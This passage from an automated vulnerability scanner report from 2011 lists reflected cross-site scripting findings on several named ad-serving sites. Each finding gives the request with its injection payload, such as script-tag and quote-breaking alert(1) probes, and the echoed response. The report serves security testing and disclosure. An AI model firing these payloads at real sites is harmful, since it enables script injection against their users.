GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f&66d9b"><script>alert(1)</script>33d30fc9f77=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:53 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?&66d9b"><script>alert(1)</script>33d30fc9f77=1http://ad.agkn.com/interaction!che=1729807310?imid=1986120337867889664&ipid=777&caid=696&cgid=293&crid=3365&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beau
...[SNIP]...
4.36. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d02"%3balert(1)//af3500c71af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d0d02";alert(1)//af3500c71af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f&d0d02"%3balert(1)//af3500c71af=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:53 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?&d0d02";alert(1)//af3500c71af=1http://ad.agkn.com/interaction!che=874001907?imid=2782821342895287091&ipid=777&caid=696&cgid=293&crid=3365&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beaut
...[SNIP]...
4.37. http://adnxs.revsci.net/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f31'-alert(1)-'3e4fe9ccd73 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90d8f31'-alert(1)-'3e4fe9ccd73&s=937499&r=1&_salt=1172267925&u=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:27 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:24:27 GMT
Content-Length: 468

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90d8f31'-alert(1)-'3e4fe9ccd73&referrer=http://www.seattlepi.com/&inv_code=937499&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90d8f31%27-alert%281%29-%273e4fe9ccd73%26s%3D93
...[SNIP]...
4.38. http://adnxs.revsci.net/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3216d'-alert(1)-'e768692f2be was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=9374993216d'-alert(1)-'e768692f2be&r=1&_salt=1172267925&u=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:24:44 GMT
Content-Length: 468

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.seattlepi.com/&inv_code=9374993216d'-alert(1)-'e768692f2be&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D9374993216d%27-alert%281%29-%27e768692f2be%26r%3D1%26_salt%3D1172267925%26u%3Dhttp%253A%2
...[SNIP]...
4.39. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee6a5<script>alert(1)</script>5c123fbe1b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/762701ee6a5<script>alert(1)</script>5c123fbe1b5?d=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@9@4e73f2c9@widget.newsinc.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 17 Sep 2011 16:35:32 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/762701ee6a5<script>alert(1)</script>5c123fbe1b5
4.40. http://adsfac.us/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 504f7"><script>alert(1)</script>97b487c8f84 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=504f7"><script>alert(1)</script>97b487c8f84&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl= HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 365
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS504f7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E97b487c8f840=uid=17420266; expires=Sun, 18-Sep-2011 16:38:26 GMT; domain=.adsfac.us; path=/
Set-Cookie: FS504f7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E97b487c8f84=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4277&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Mon, 17-Oct-2011 16:38:26 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=98310839266265250e8c376c5f1b330f262bd69; expires=Mon, 17-Oct-2011 16:38:26 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:26 GMT
Connection: close

<a href="http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=http://adsfac.us/link.asp?cc=504f7"><script>alert(1)</script>97b487c8f84.0.0&CreativeID=1" target=_blank>
...[SNIP]...
4.41. http://adsfac.us/ag.asp [clk parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the clk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33c3d'%3balert(1)//f39440116ba was submitted in the clk parameter. This input was echoed as 33c3d';alert(1)//f39440116ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.asp?cc=ETN002.315724.0&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=33c3d'%3balert(1)//f39440116ba HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 4241
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSETN002315724=uid=17423833; expires=Sun, 18-Sep-2011 16:38:34 GMT; domain=.adsfac.us; path=/
Set-Cookie: FSETN002=pctl=315724&pctm=57&FL315724=12&fpt=0%2C315724%2C&pct%5Fdate=4277&FM39594=12&pctc=39594&FQ=12; expires=Mon, 17-Oct-2011 16:38:34 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=98310839266265250e8c376c5f1b330f262bd69; expires=Mon, 17-Oct-2011 16:38:34 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:33 GMT
Connection: close

<html><head></head><body><script type="text/javascript">var fd_imp='http://adsfac.us/creative.asp?CreativeID=39594';var fd_clk='http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=33c3d';alert(1)//f39440116bahttp://adsfac.us/link.asp?cc=ETN002.315724.0&CreativeID=39594';var fd_wdt=728;var fd_hgt=90;document.writeln("<!-- Aug 11 2011 4:37:48:773PM(v10) -->
...[SNIP]...
4.42. http://adsfac.us/ag.asp [clk parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the clk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6104"><script>alert(1)</script>3966686c35b was submitted in the clk parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=ETN002.315724.0&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=c6104"><script>alert(1)</script>3966686c35b HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 4271
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSETN002315724=uid=17423629; expires=Sun, 18-Sep-2011 16:38:32 GMT; domain=.adsfac.us; path=/
Set-Cookie: FSETN002=pctl=315724&pctm=55&FL315724=12&fpt=0%2C315724%2C&pct%5Fdate=4277&FM39594=12&pctc=39594&FQ=12; expires=Mon, 17-Oct-2011 16:38:32 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=98310839266265250e8c376c5f1b330f262bd69; expires=Mon, 17-Oct-2011 16:38:32 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:33 GMT
Connection: close

<html><head></head><body><script type="text/javascript">var fd_imp='http://adsfac.us/creative.asp?CreativeID=39594';var fd_clk='http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sd
...[SNIP]...
<a target="_blank" href="http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=c6104"><script>alert(1)</script>3966686c35bhttp://adsfac.us/link.asp?cc=ETN002.315724.0&CreativeID=39594">
...[SNIP]...
4.43. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a11bc"-alert(1)-"b393fe7193b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a11bc"-alert(1)-"b393fe7193b/0/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/a11bc"-alert(1)-"b393fe7193b/0/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...
4.44. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79aaf"><script>alert(1)</script>0cb01a4ae72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /79aaf"><script>alert(1)</script>0cb01a4ae72/0/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/79aaf"><script>alert(1)</script>0cb01a4ae72/0/4/1/" />
...[SNIP]...
4.45. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff5d"><script>alert(1)</script>de78e1ca44a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bff5d"><script>alert(1)</script>de78e1ca44a/1/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:30:01 GMT
